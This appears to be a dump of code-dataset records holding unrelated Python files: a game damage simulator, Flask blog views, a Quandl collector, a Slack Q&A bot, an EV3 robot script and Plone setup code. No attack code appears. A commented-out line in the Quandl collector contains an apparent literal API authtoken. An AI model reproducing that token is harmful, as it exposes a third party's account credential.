timedelta = timedelta(seconds=2.5)\n cost: Tuple[Resource, int] = None\n guarantee_crit: bool = None\n hastened_by: Attribute = None\n is_off_gcd: bool = False\n potency: int = 0\n powered_by: Attribute = None\n shares_recast_with: 'Action' = None\n\n def __init__(self, sim: Simulation, source: Actor):\n self.sim = sim\n self.source = source\n self.can_recast_at = None\n\n @property\n def name(self):\n return self.__class__.__name__\n\n def perform(self):\n if self.on_cooldown:\n raise ActionOnCooldownError(self.sim, self.source, self)\n\n if self.animation > timedelta() and \\\n self.source.animation_unlock_at is not None and \\\n self.source.animation_unlock_at > self.sim.current_time:\n raise ActorAnimationLockedError(self.sim, self.source, self)\n\n if not self.is_off_gcd and \\\n self.source.gcd_unlock_at is not None and \\\n self.source.gcd_unlock_at > self.sim.current_time:\n raise ActorGCDLockedError(self.sim, self.source, self)\n\n self.sim.logger.debug('[%s] @@ %s %s uses %s', self.sim.current_iteration, self.sim.relative_timestamp,\n self.source, self)\n\n self.source.animation_unlock_at = self.sim.current_time + self.animation\n self.sim.schedule(ActorReadyEvent(self.sim, self.source), max(self.animation, self.cast_time))\n\n if not self.is_off_gcd:\n self.source.gcd_unlock_at = self.sim.current_time + self.gcd\n self.sim.schedule(ActorReadyEvent(self.sim, self.source), max(self.cast_time, self.gcd))\n\n self.set_recast_at(self.recast_time)\n\n self.schedule_resource_consumption()\n\n self.schedule_damage_event()\n\n def schedule_resource_consumption(self):\n if self.cost is not None:\n resource, amount = self.cost\n self.sim.schedule(ResourceEvent(self.sim, self.source, resource, -amount))\n\n def schedule_damage_event(self):\n if self.potency > 0:\n self.sim.schedule(\n DamageEvent(self.sim, self.source, self.source.target, self, self.potency, self._trait_multipliers,\n self._buff_multipliers, self.guarantee_crit), self.cast_time)\n\n def set_recast_at(self, delta: timedelta):\n recast_at = self.sim.current_time + delta\n\n self.can_recast_at = recast_at\n\n if self.shares_recast_with is not None:\n self.shares_recast_with.can_recast_at = recast_at\n\n def schedule_aura_events(self, target: Actor, aura: Aura):\n if aura.expiration_event is not None:\n self.sim.schedule(RefreshAuraEvent(self.sim, target, aura))\n self.sim.unschedule(aura.expiration_event)\n else:\n aura.application_event = ApplyAuraEvent(self.sim, target, aura)\n aura.expiration_event = ExpireAuraEvent(self.sim, target, aura)\n\n self.sim.schedule(aura.application_event)\n self.sim.schedule(aura.expiration_event, aura.duration)\n\n def schedule_dot(self, dot: TickingAura):\n self.schedule_aura_events(self.source.target, dot)\n\n if dot.tick_event is not None and dot.tick_event.timestamp > self.sim.current_time:\n self.sim.unschedule(dot.tick_event)\n\n tick_event = DotTickEvent(self.sim, self.source, self.source.target, self, dot.potency, dot)\n\n dot.tick_event = tick_event\n\n self.sim.schedule(tick_event, timedelta(seconds=3))\n\n @property\n def on_cooldown(self):\n return self.can_recast_at is not None and self.can_recast_at > self.sim.current_time\n\n @property\n def cooldown_remains(self):\n return timedelta() if not self.on_cooldown else self.can_recast_at - self.sim.current_time\n\n @property\n def cast_time(self):\n return self._speed(self.base_cast_time)\n\n @property\n def recast_time(self):\n if self.base_recast_time > timedelta(seconds=2.5):\n return self._speed(self.base_recast_time)\n\n return self.gcd\n\n @property\n def gcd(self):\n return self._speed(timedelta(seconds=2.5))\n\n @property\n def type_ii_speed_mod(self):\n return 0\n\n def _speed(self, action_delay: timedelta) -> timedelta:\n speed = self.source.stats[self.hastened_by]\n\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n\n # TODO Implement all these buffs.\n\n rapid_fire = False\n\n if rapid_fire:\n return timedelta(seconds=1.5)\n\n arrow_mod = 0\n haste_mod = 0\n fey_wind_mod = 0\n\n riddle_of_fire = False\n riddle_of_fire_mod = 115 if riddle_of_fire else 100\n\n astral_umbral = False\n astral_umbral_mod = 50 if astral_umbral else 100\n\n type_1_mod = 0\n type_2_mod = self.type_ii_speed_mod\n\n gcd_m = floor((1000 - floor(130 * (speed - sub_stat) / divisor)) * action_delay.total_seconds())\n\n gcd_c_a = floor(\n floor(floor((100 - arrow_mod) * (100 - type_1_mod) / 100) * (100 - haste_mod) / 100) - fey_wind_mod\n )\n gcd_c_b = (type_2_mod - 100) / -100\n gcd_c = floor(\n floor(floor(ceil(gcd_c_a * gcd_c_b) * gcd_m / 100) * riddle_of_fire_mod / 1000) * astral_umbral_mod / 100\n )\n\n gcd = gcd_c / 100\n\n return timedelta(seconds=gcd)\n\n @property\n def _buff_multipliers(self) -> List[float]:\n return [1.0]\n\n @property\n def _trait_multipliers(self) -> List[float]:\n return [1.0]\n\n def __str__(self):\n return '<{cls}>'.format(cls=self.__class__.__name__)\n\n\nclass ResourceEvent(Event):\n def __init__(self, sim: Simulation, target: Actor, resource: Resource, amount: int):\n super().__init__(sim)\n\n self.target = target\n self.resource = resource\n self.amount = amount\n\n def execute(self) -> None:\n current, maximum = self.target.resources[self.resource]\n\n final_resource = max(min(current + self.amount, maximum), 0)\n\n self.target.resources[self.resource] = (final_resource, maximum)\n self.target.statistics['resources'].append({\n 'iteration': self.sim.current_iteration,\n 'timestamp': self.sim.current_time,\n 'target': self.target.name,\n 'resource': self.resource,\n 'amount': self.amount,\n 'level': final_resource,\n })\n\n def __str__(self):\n return '<{cls} target={target} resource={resource} amount={amount}>'.format(\n cls=self.__class__.__name__,\n target=self.target.name,\n resource=self.resource,\n amount=self.amount,\n )\n\n\nclass ServerTickEvent(Event):\n def execute(self) -> None:\n super().execute()\n\n for actor in self.sim.actors:\n current_mp, max_mp = actor.resources[Resource.MP]\n current_tp, max_tp = actor.resources[Resource.TP]\n\n if current_mp < max_mp:\n mp_tick = int(floor(0.02 * max_mp))\n\n self.sim.schedule(ResourceEvent(self.sim, actor, Resource.MP, mp_tick)) # TODO Tick rate?\n\n if current_tp < max_tp:\n self.sim.schedule(ResourceEvent(self.sim, actor, Resource.TP, 60)) # TODO Tick rate?\n\n\nclass ApplyAuraStackEvent(AuraEvent):\n def execute(self) -> None:\n if self.aura.stacks < self.aura.max_stacks:\n self.aura.stacks += 1\n\n\nclass AutoAttackAction(Action):\n animation = timedelta()\n is_off_gcd = True\n hastened_by = Attribute.SKILL_SPEED\n\n # TODO Would like to avoid having to duplicate so much code here.\n def perform(self):\n super().perform()\n\n self.sim.schedule(ActorReadyEvent(self.sim, self.source), self.recast_time)\n\n @property\n def base_recast_time(self):\n return timedelta(seconds=self.source.gear[Slot.WEAPON].delay)\n\n def create_damage_event(self):\n self.sim.schedule(\n AutoAttackEvent(self.sim, self.source, self.source.target, self, self.potency, self._trait_multipliers,\n self._buff_multipliers, self.guarantee_crit))\n\n\nclass MeleeAttackAction(AutoAttackAction):\n name = 'Attack'\n potency = 110\n\n\nclass ShotAction(AutoAttackAction):\n name = 'Shot'\n potency = 100\n\n\nclass AutoAttackEvent(DamageEvent):\n @property\n def damage(self) -> int:\n if self._damage is not None:\n return self._damage\n\n base_stats = get_base_stats_by_job(self.source.job)\n\n if self.source.job in [Job.BARD, Job.MACHINIST, Job.NINJA]:\n job_attribute_modifier = base_stats[Attribute.DEXTERITY]\n attack_rating = self.source.stats[Attribute.DEXTERITY]\n else:\n job_attribute_modifier = base_stats[Attribute.STRENGTH]\n attack_rating = self.source.stats[Attribute.STRENGTH]\n\n weapon_damage = self.source.gear[Slot.WEAPON].physical_damage\n weapon_delay = self.source.gear[Slot.WEAPON].delay\n\n main_stat = main_stat_per_level[self.source.level]\n sub_stat = sub_stat_per_level[self.source.level]\n divisor = divisor_per_level[self.source.level]\n\n f_ptc = self.potency / 100\n f_aa = floor(floor((main_stat * job_attribute_modifier / 1000) + weapon_damage) * (weapon_delay / 3))\n f_atk = floor((125 * (attack_rating - 292) / 292) + 100) / 100\n f_det = floor(130 * (self.source.stats[Attribute.DETERMINATION] - main_stat) / divisor + 1000) / 1000\n f_tnc = floor(100 * (self.source.stats[Attribute.TENACITY] - sub_stat) / divisor + 1000) / 1000\n f_chr = floor(200 * (self.source.stats[Attribute.CRITICAL_HIT] - sub_stat) / divisor + 1400) / 1000\n\n damage_randomization = numpy.random.uniform(0.95, 1.05)\n\n damage = f_ptc * f_aa * f_atk * f_det * f_tnc\n\n for m in self.trait_multipliers:\n damage *= m\n\n damage = floor(damage)\n damage = floor(damage * (f_chr if self.is_critical_hit else 1))\n damage = floor(damage * (1.25 if self.is_direct_hit else 1))\n damage = floor(damage * damage_randomization)\n\n for m in self.buff_multipliers:\n damage = floor(damage * m)\n\n self._damage = int(damage)\n\n return self._damage\n\n\nclass FailedActionAttemptError(Exception):\n pass\n\n\nclass ActionOnCooldownError(FailedActionAttemptError):\n def __init__(self, sim: Simulation, source: Actor, action: Action, *args: object, **kwargs: object) -> None:\n super().__init__('%s tried to use %s, but on cooldown for %.3f' %\n (source, action, action.cooldown_remains.total_seconds()), *args, **kwargs)\n\n\nclass ActorAnimationLockedError(FailedActionAttemptError):\n def __init__(self, sim: Simulation, source: Actor, action: Action, *args: object, **kwargs: object) -> None:\n super().__init__('%s tried to use %s, but animation locked for %.3f' %\n (source, action, (source.animation_unlock_at - sim.current_time).total_seconds()), *args,\n **kwargs)\n\n\nclass ActorGCDLockedError(FailedActionAttemptError):\n def __init__(self, sim: Simulation, source: Actor, action: Action, *args: object, **kwargs: object) -> None:\n super().__init__('%s tried to use %s, but GCD locked for %.3f' %\n (source, action, (source.gcd_unlock_at - sim.current_time).total_seconds()), *args,\n **kwargs)\n","sub_path":"simfantasy/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":31382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"126864412","text":"from io import BytesIO\nfrom os.path import join\n\nfrom flask import (\n abort, current_app, flash, redirect, render_template,\n request, session, send_file, send_from_directory, url_for)\nfrom flask_login import current_user, login_required\n\nfrom .. import db\nfrom ..models.auth import User\nfrom ..models.auth_units import average, groups, permissions, roots\nfrom ..models.blogs import Entity\nfrom ..models.captcha import Captcha\nfrom ..models.links import Link\nfrom ..models.pictures import Picture\nfrom . import main\n\n\n@main.route('/society/', methods=['GET', 'POST'])\n@login_required\ndef show_profile(username):\n target = User.query.filter_by(username=username).first_or_404()\n if current_user != target and \\\n not current_user.can(permissions.FOLLOW_USERS):\n abort(403)\n if request.method == 'POST' and \\\n (current_user != target and\n (current_user.can(permissions.ADMINISTER_SERVICE) or\n (current_user.can(permissions.CHANGE_USER_ROLE) and\n not target.can(permissions.CHANGE_USER_ROLE)) or\n (current_user.group == groups.keeper and\n target.group != groups.keeper and\n not target.can(permissions.ADMINISTER_SERVICE)))):\n if request.form.get('cannot-log-in', None, type=str):\n target.permissions = [permissions.CANNOT_LOG_IN]\n elif request.form.get('administer-service', None, type=str):\n target.permissions = roots\n else:\n current = list()\n for each in average:\n if request.form.get(each, None, type=str):\n current.append(average[each])\n if (permissions.CHANGE_USER_ROLE in current or\n permissions.BLOCK_ENTITY in current) \\\n and permissions.FOLLOW_USERS not in current:\n current.append(permissions.FOLLOW_USERS)\n target.permissions = current or [permissions.CANNOT_LOG_IN]\n db.session.add(target)\n db.session.commit()\n flash('Разрешения {0} успешно изменены.'.format(target.username))\n return redirect(url_for('main.show_profile', username=target.username))\n return render_template('main/profile.html', target=target)\n\n\n@main.route('/')\ndef show_index():\n return render_template('main/index.html')\n\n\n@main.route('/favicon.ico')\ndef show_favicon():\n return send_from_directory(\n join(current_app.static_folder, 'images'), request.path[1:],\n mimetype='image/vnd.microsoft.icon')\n\n\n@main.route('/captcha/')\ndef show_captcha(suffix):\n captcha = Captcha.query.filter_by(suffix=suffix).first_or_404()\n response = send_file(\n BytesIO(captcha.picture), mimetype='image/jpeg', cache_timeout=0)\n response.content_length = len(captcha.picture)\n response.cache_control.no_store = True\n response.cache_control.no_cache = True\n response.cache_control.must_revalidate = True\n response.cache_control.public = False\n return response\n\n\n@main.route('/')\ndef jump(suffix):\n if len(suffix) in (6, 7, 9, 10):\n link = Link.query.filter_by(suffix=suffix).first_or_404()\n jumps = session.get('jumps', list())\n if link.suffix not in jumps and current_user != link.author:\n link.clicked += 1\n if link.clicked > 9999:\n link.clicked = 9\n db.session.add(link)\n db.session.commit()\n jumps.append(link.suffix)\n session['jumps'] = jumps\n return redirect(link.url)\n elif len(suffix) in (8, 11, 12, 13):\n entity = Entity.query.filter_by(suffix=suffix).first_or_404()\n return redirect(url_for('blogs.show_entity', slug=entity.slug))\n abort(404)\n\n\n@main.route('/picture/')\ndef show_picture(suffix):\n picture = Picture.query.filter_by(suffix=suffix).first_or_404()\n if current_user != picture.album.author:\n picture.viewed += 1\n db.session.add(picture)\n db.session.commit()\n m_type = 'image/{0}'.format(picture.format.lower())\n response = send_file(BytesIO(picture.picture), mimetype=m_type)\n response.content_length = picture.volume\n return response\n","sub_path":"auriz/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"408253662","text":"\"\"\"\n@author: Sophia Song\n@contact: fsong@splunk.com\n@since: 6/22/16\n\"\"\"\n# Import the necessary package to process data in JSON format\nimport json\nimport os\nimport time\nimport requests\nfrom base.collector_base import ApiCollector,read_conf_item\n\nimport quandl\nAPI_KEYS = read_conf_item('collector', 'FinancialCollector', 'api_key', return_list=True)\n\nclass FeatureCollector(ApiCollector):\n def __init__(self):\n super(FeatureCollector, self).__init__(sourcetype=\"feature\", source='https://www.quandl.com/data/CHRIS')\n\n def get_database(self):\n pass\n\n def start(self):\n # data = quandl.get(\"WIKI/MYRG\", authtoken=\"UgH_Za9s6vwzU8JowASW\")\n i=0\n len_api = len(API_KEYS)\n with open(os.path.join(os.path.dirname(__file__), 'CHRIS-datasets-codes.csv'), 'r') as f:\n for line in f.readlines():\n starttime = time.time()\n info = line.split(\",\")[0].split(\"/\")\n database = info[0]\n dataset = info[1]\n key = API_KEYS[i%len_api]\n format = \"csv\"\n i += 1\n endpoint = 'https://www.quandl.com/api/v3/datasets/{database}/{dataset}.{format}?api_key={key}'\\\n .format(database=database,\n dataset=dataset,\n format=format,\n key=key)\n # data = self.request_get(endpoint, use_proxy=True, block=False, callback=self.process_response)\n data = requests.get(endpoint)\n self.output_event(data.content)\n assert data.status_code==200\n endtime = time.time()\n print (i, database, dataset, endtime-starttime, key)\n\n\n def process_response(self, response):\n self.output_event(response.content)\n\n\nif __name__ == '__main__':\n import multiprocessing\n\n results = multiprocessing.Queue()\n feature_collector = FeatureCollector()\n feature_collector.set_result_queue(results)\n feature_collector.start()\n","sub_path":"use_api/financial/futures/feature_collector.py","file_name":"feature_collector.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"103673864","text":"# -*- coding: utf-8 -*-\nfrom docutils.writers.html4css1 import HTMLTranslator\n\n_old_starttag = HTMLTranslator.starttag\n\n\ndef starttag(self, node, tagname, suffix='\\n', empty=False, **attributes):\n attrs = node.non_default_attributes().items()\n attributes.update(dict([(k, v) for k, v in attrs\n if k.startswith('data-')]))\n result = _old_starttag(self, node, tagname,\n suffix=suffix, empty=empty, **attributes)\n return result\n\nHTMLTranslator.starttag = starttag\n","sub_path":"impress/monkeys.py","file_name":"monkeys.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"188032980","text":"import json\nfrom slacker import Slacker\nfrom flask import Flask, request, make_response\nimport numpy as np\nimport pandas as pd\nfrom server.db import dbModule as db\nfrom sentence_transformers import SentenceTransformer, util\nimport scipy.stats\n\n\ntoken = ''\nslack = Slacker(token)\n\n# slack.chat.post_message(\"#chatbot-test-channel\", \"slacker 테스트\")\n# 전역변수 선언\nstatus_value = False\ntop_results =''\n\n\ndef reconstruct_dataframe(json_df):\n temp1 = []\n temp2 = []\n id_temp = json_df.loc[0, \"질문 메세지 id\"]\n question_df = json_df.loc[0, \"질문내용\"]\n result_df = \"답변(\" + json_df.loc[0, '답변자 이름'] + \")\" + '\\n' + json_df.loc[0, \"답변내용\"]\n\n for i in range(1, len(json_df)):\n if id_temp != json_df.loc[i, \"질문 메세지 id\"]:\n temp1.append(question_df)\n result_df = \"질문(\" + json_df.loc[i - 1, '질문자 이름'] + ')' + '\\n' + question_df + \"\\n\\n\\n\" +result_df\n temp2.append(result_df)\n result_df = ''\n\n id_temp = json_df.loc[i, \"질문 메세지 id\"]\n question_df = json_df.loc[i, \"질문내용\"]\n result_df = result_df + '\\n\\n' + \"답변(\" + json_df.loc[i, '답변자 이름'] + \")\" + '\\n' + str(json_df.loc[i, \"답변내용\"])\n\n reconstruct_df = pd.DataFrame({\"질문내용\": temp1, \"결과 값\": temp2})\n return reconstruct_df\n\n# 데이터 로드\ndatabase = db.Database()\nqa_sql = \"SELECT * FROM leedo.qa_dataset\"\nig_sql = \"SELECT * FROM leedo.imground\"\ndataset_qa = pd.read_json(json.dumps(database.execute_all(qa_sql)),orient='records')\ndataset_ig = pd.read_json(json.dumps(database.execute_all(ig_sql)),orient='records')\n\ncolumns = ['QAID','질문 날짜','답변 날짜',\n '질문 메세지 id','답변 메세지 id',\n '질문자 id', '답변자 id',\n '질문자 이름', '답변자 이름',\n '질문내용', '답변내용','채널']\ndataset_qa.columns = columns\ndataset_ig.columns = columns\n#dataset_ig = pd.read_json('/Users/sinjaeug/Desktop/프로젝트/2020_2학기 프로젝트/Leedo Dataset/imground_dataset.json')\n#dataset_qa = pd.read_json('/Users/sinjaeug/Desktop/프로젝트/2020_2학기 프로젝트/Leedo Dataset/qa_dataset.json')\ndataset_qa = reconstruct_dataframe(dataset_qa)\n\n# 데이터 로드 후 index 순서대로 정렬\n# 코드작성하기!!!!!!!\n##########\n\n\n# Corpus and Name 셋 세팅\n# imground_part\ncorpus_ig = dataset_ig['content'].values.tolist()\ncorpus_ig = [word.replace('\\xa0', ' ') for word in corpus_ig]\nname_ig = dataset_ig['name'].values.tolist()\nname_ig = [word.replace('\\xa0',' ') for word in name_ig]\n\n# qa_part\ncorpus_qa = dataset_qa['질문내용'].values.tolist()\ncorpus_answer = dataset_qa['결과 값'].values.tolist()\n\nattachment_answer_json = {\n\t\"blocks\": [\n\t\t{\n\t\t\t\"type\": \"actions\",\n\t\t\t\"elements\": [\n\t\t\t\t{\n\t\t\t\t\t\"type\": \"static_select\",\n\t\t\t\t\t\"placeholder\": {\n\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\"text\": \"유사한 질문 목록\"\n\t\t\t\t\t},\n\t\t\t\t\t\"options\": [\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"text\": {\n\t\t\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\t\t\"text\": \"1\"\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"value\": \"0\"\n\t\t\t\t\t\t},\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"text\": {\n\t\t\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\t\t\"text\": \"2\"\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"value\": \"1\"\n\t\t\t\t\t\t},\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"text\": {\n\t\t\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\t\t\"text\": \"3\"\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"value\": \"2\"\n\t\t\t\t\t\t},\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"text\": {\n\t\t\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\t\t\"text\": \"4\"\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"value\": \"3\"\n\t\t\t\t\t\t},\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t\"text\": {\n\t\t\t\t\t\t\t\t\"type\": \"plain_text\",\n\t\t\t\t\t\t\t\t\"text\": \"5\"\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"value\": \"4\"\n\t\t\t\t\t\t}\n\t\t\t\t\t],\n\t\t\t\t\t\"action_id\": \"actionId-3\"\n\t\t\t\t}\n\t\t\t]\n\t\t}\n\t]\n}\n\n\n# embedding 모듈 load\n\n\n# 1.2 ver\nmodel_path = './output/training_stsbenchmark_distilbert-base-multilingual-cased-v2-KakaoSTS'\nembedder = SentenceTransformer(model_path)\n# embedder = SentenceTransformer('distiluse-base-multilingual-cased-v2') # 1.1ver\n# embedder = SentenceTransformer('xlm-r-bert-base-nli-stsb-mean-tokens')\n\n\n# corpus Embedding\ncorpus_embeddings_qa = embedder.encode(corpus_qa, convert_to_tensor=True)\ncorpus_embeddings_ig = embedder.encode(corpus_ig, convert_to_tensor=True)\n\n\napp = Flask(__name__)\n\n\ndef get_answer():\n return \"EA (EconoAsistant) 사용법 \\n\\n1. Q&A \\n\\n - 키워드를 통해 분야에 대해 알아봐요 - \\n \" \\\n \"느낌표 1개 (!)를 붙이고 키워드나 문구를 \\n 적으면 관련된 질의 응답을 알려드립니다.\\n\\n2. \" \\\n \"I'm Ground \\n\\n - 키워드를 통해 에코노인을 알아봐요 - \\n 느낌표 2개 (!!)를 붙이고 키워드나 \" \\\n \"문구를 \\n 적으면 관련된 사람을 알려드립니다. \\n\\n%주의사항% \\n\\n - 맞춤법 필수, 이모티콘이�� \" \\\n \"특수문자를 사용하지 마세요 \"\n\n\ndef event_handler(event_type, slack_event):\n print(\"3번오류\")\n if event_type == \"app_mention\":\n channel = slack_event[\"event\"][\"channel\"]\n text = get_answer()\n slack.chat.post_message(channel, text)\n return make_response(\"앱 멘션 메시지가 보내졌습니다.\", 202,)\n\n if event_type == \"message\":\n channel = slack_event[\"event\"][\"channel\"]\n message_query = slack_event[\"event\"][\"text\"]\n text = ''\n if message_query[1] == '!':\n text = im_ground(message_query)\n slack.chat.post_message(channel, text)\n else:\n text = question_answer(message_query)\n print(text)\n slack.chat.post_message(channel, attachments=[text])\n\n return make_response(\"앱 멘션 메시지가 보내졌습니다.\", 202,)\n\n message = \"[%s] 이벤트 핸들러를 찾을 수 없습니다\" % event_type\n return make_response(message, 200, {\"X-Slack-No-Retry\": 1})\n\n\ndef query_confirm(query_input):\n global status_value\n if query_input[0:1] == \"!\" or query_input[0:2] == \"!!\":\n status_value = True\n return True\n else:\n status_value = False\n return False\n\n\n# !를 제거 하는 함수\ndef delete_exclamation_mark(query_input):\n if query_input[0:1] == \"!\":\n return query_input[1:]\n elif query_input[0:2] == \"!!\":\n return query_input[2:]\n\n\ndef question_answer(query_input):\n global top_results\n query = delete_exclamation_mark(query_input)\n\n # query embedding\n query_embedding = embedder.encode(query, convert_to_tensor=True)\n\n # Spearman 상관계수가 0.3보다 높은 값의 내용만 얻음\n Top_Context = []\n\n for idx in range(len(corpus_embeddings_ig)):\n spearmanr = scipy.stats.spearmanr(query_embedding, corpus_embeddings_qa[idx])\n if abs(spearmanr[0]) > 0.3:\n Top_Context.append([spearmanr[0], idx])\n\n # 상위부터 정렬\n Top_Context = sorted(Top_Context, reverse=True)\n\n top_k = 5\n\n read_text_to_json = json.dumps(attachment_answer_json)\n read_json = json.loads(read_text_to_json)\n\n for i in range(top_k):\n temp_str = str(i + 1) + \"번 \" + corpus_qa[Top_Context[idx][1]].strip()\n temp_str = temp_str[0:30] + \"(%2.f%%)\" % (Top_Context[idx][0]*100)\n read_json[\"blocks\"][0]['elements'][0]['options'][i]['text']['text'] = temp_str\n\n return read_json\n\n\ndef im_ground(query_input):\n query = delete_exclamation_mark(query_input)\n\n # query_embedding\n query_embedding = embedder.encode(query, convert_to_tensor=True)\n\n # Spearman 상관계수가 0.3보다 높은 값의 내용만 얻음\n Top_Context = []\n\n for idx in range(len(corpus_embeddings_ig)):\n spearmanr = scipy.stats.spearmanr(query_embedding, corpus_embeddings_ig[idx])\n if abs(spearmanr[0]) > 0.3:\n Top_Context.append([spearmanr[0], idx])\n\n #상위부터 정렬\n Top_Context = sorted(Top_Context, reverse=True)\n\n name_overlap = []\n\n number = 1\n result = \"\"\n\n # 상위 5개 출력 (중복제거)\n\n for idx in range(len(Top_Context)):\n if number > 5:\n break\n if not name_ig[Top_Context[idx][1]] in name_overlap:\n temp = str(idx + 1) + \"번\" + name_ig[Top_Context[idx][1]].strip() + \", \" + corpus_ig[Top_Context[idx][1]].strip() + \"\\n\"\n result = result + str(temp)\n name_overlap.append(name_ig[Top_Context[idx][1]].strip())\n number += 1\n\n \"\"\"print(\"유사도 : \", Top_Context[idx][0])\n print(\"이름 : \", name[Top_Context[idx][1]])\n print(\"내용 : \", corpus[Top_Context[idx][1]])\n name_overlap.append(name[Top_Context[idx][1]].strip())\n number += 1\"\"\"\n\n return result\n\n\n@app.route(\"/slack\", methods=[\"GET\", \"POST\"])\ndef hears():\n slack_event = json.loads(request.data)\n print(\"1번 오류\")\n if \"challenge\" in slack_event: # 슬랙이 정상적으로 웹서버가 동작하는지 확인하는 과정\n return make_response(slack_event[\"challenge\"], 200,\n {\"content_type\": \"application/json\"})\n\n if \"event\" in slack_event:\n event_type = slack_event[\"event\"][\"type\"]\n message_query = slack_event[\"event\"][\"text\"]\n if query_confirm(message_query):\n return event_handler(event_type, slack_event)\n return make_response(\"슬랙 요청에 이벤트가 없습니다\", 404,\n {\"X-Slack-No-Retry\": 1})\n return make_response(\"슬랙 요청에 이벤트가 없습니다\", 404,\n {\"X-Slack-No-Retry\": 1})\n\n\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\ndef index():\n return \"Hello World\"\n\n\n@app.route(\"/slack/message_actions\", methods=[\"POST\"])\ndef message_actions():\n # 리퀘스트 파징\n form_json = json.loads(request.form[\"payload\"])\n\n print(\"2번오류\")\n # 선택한 값이 버튼일 때\n selection = form_json[\"actions\"][0][\"selected_option\"][\"value\"]\n slack.chat.update(form_json[\"channel\"][\"id\"], form_json[\"container\"][\"message_ts\"], corpus_answer[top_results[int(selection)]])\n\n return make_response(\"\", 200)\n\n\nif __name__ == '__main__':\n app.run('0.0.0.0', port=8080)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"635049680","text":"#!/usr/bin/python3\n\nfrom time import sleep\n\nfrom ev3dev.ev3 import *\n\nultraMotor = MediumMotor(OUTPUT_C)\nassert ultraMotor.connected, \"Error: Ultra motor not connected\"\nultraMotor.reset() # Set the current angle to 0\nultraMotor.stop_action = \"brake\"\n\n# Will need to check EV3 button state\nbtn = Button()\n\n# Connect ultrasonic sensor\n# https://sites.google.com/site/ev3python/learn_ev3_python/using-sensors\n# https://media.readthedocs.org/pdf/ev3dev-lang/latest/ev3dev-lang.pdf\nultraSensor = UltrasonicSensor()\nassert ultraSensor.connected, \"Error: Ultrasonic sensor not connected\"\nultraSensor.mode = \"US-DIST-CM\" # This is actually in millimetres\n\nSPEED = 360\n\ndef scan_turret():\n ultraMotor.position_sp = 0\n ultraMotor.run_to_abs_pos(speed_sp = SPEED)\n while any(ultraMotor.state): # Wait until finished rotating\n sleep(0.02)\n front = ultraSensor.value() // 42\n\n ultraMotor.position_sp = -90\n ultraMotor.run_to_abs_pos(speed_sp = SPEED)\n while any(ultraMotor.state): # Wait until finished rotating\n sleep(0.02)\n left = ultraSensor.value() // 42\n\n ultraMotor.position_sp = 90\n ultraMotor.run_to_abs_pos(speed_sp = SPEED)\n while any(ultraMotor.state): # Wait until finished rotating\n sleep(0.02)\n right = ultraSensor.value() // 42\n\n print(\"front walls: %d\" % front)\n print(\"left walls: %d\" % left)\n print(\"right walls: %d\" % right)\n\nwhile not (btn.any()):\n x = int(input())\n scan_turret()\n","sub_path":"testultra.py","file_name":"testultra.py","file_ext":"py","file_size_in_byte":1461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"429859185","text":"from Products.CMFCore.utils import getToolByName\nfrom plonede.content.config import PROJECTNAME\nfrom Products.CMFPlone.interfaces import IPropertiesTool\n\n# maybe we use this later on\n#_PROPERTIES = [\n# dict(name='prop', type_='string', value='val'),\n#]\n\ndef setupVarious(context):\n\n if context.readDataFile('plonede.content_various.txt') is None:\n return\n \n site = context.getSite()\n logger = context.getLogger(PROJECTNAME)\n\n #setVersionedTypes(site)\n #add_catalog_indexes(site, logger)\n #setProperties(site)\n\n\ndef setProperties(site):\n \"\"\"Enable versioning for custom content types used by iterate\n \"\"\"\n properties_tool = getToolByName(site, 'portal_properties')\n properties = properties_tool.plonede_properties\n\n for property in _PROPERTIES:\n if not properties.hasProperty(property['name']):\n properties.manage_addProperty(property['name'], property['value'], property['type_'])\n \ndef add_catalog_indexes(site, logger):\n \"\"\"Add our indexes to the catalog.\n\n Doing it here instead of in profiles/default/catalog.xml means we\n do not need to reindex those indexes after every reinstall.\n \"\"\"\n catalog = getToolByName(site, 'portal_catalog')\n indexes = catalog.indexes()\n\n wanted = ((\"fieldname\", \"FieldIndex\"),\n )\n \n for name, meta_type in wanted:\n if name not in indexes:\n catalog.addIndex(name, meta_type)\n logger.info(\"Added %s for field %s.\", meta_type, name)\n \n if name not in catalog.schema():\n catalog.addColumn(name)\n logger.info(\"Added Column for %s.\", name)\n","sub_path":"src/plonede.content/plonede/content/setuphandlers.py","file_name":"setuphandlers.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"457535062","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtCore, QtGui, QtSql, uic\nimport QEditorAbstract, QWSException, QExceptionDefines, 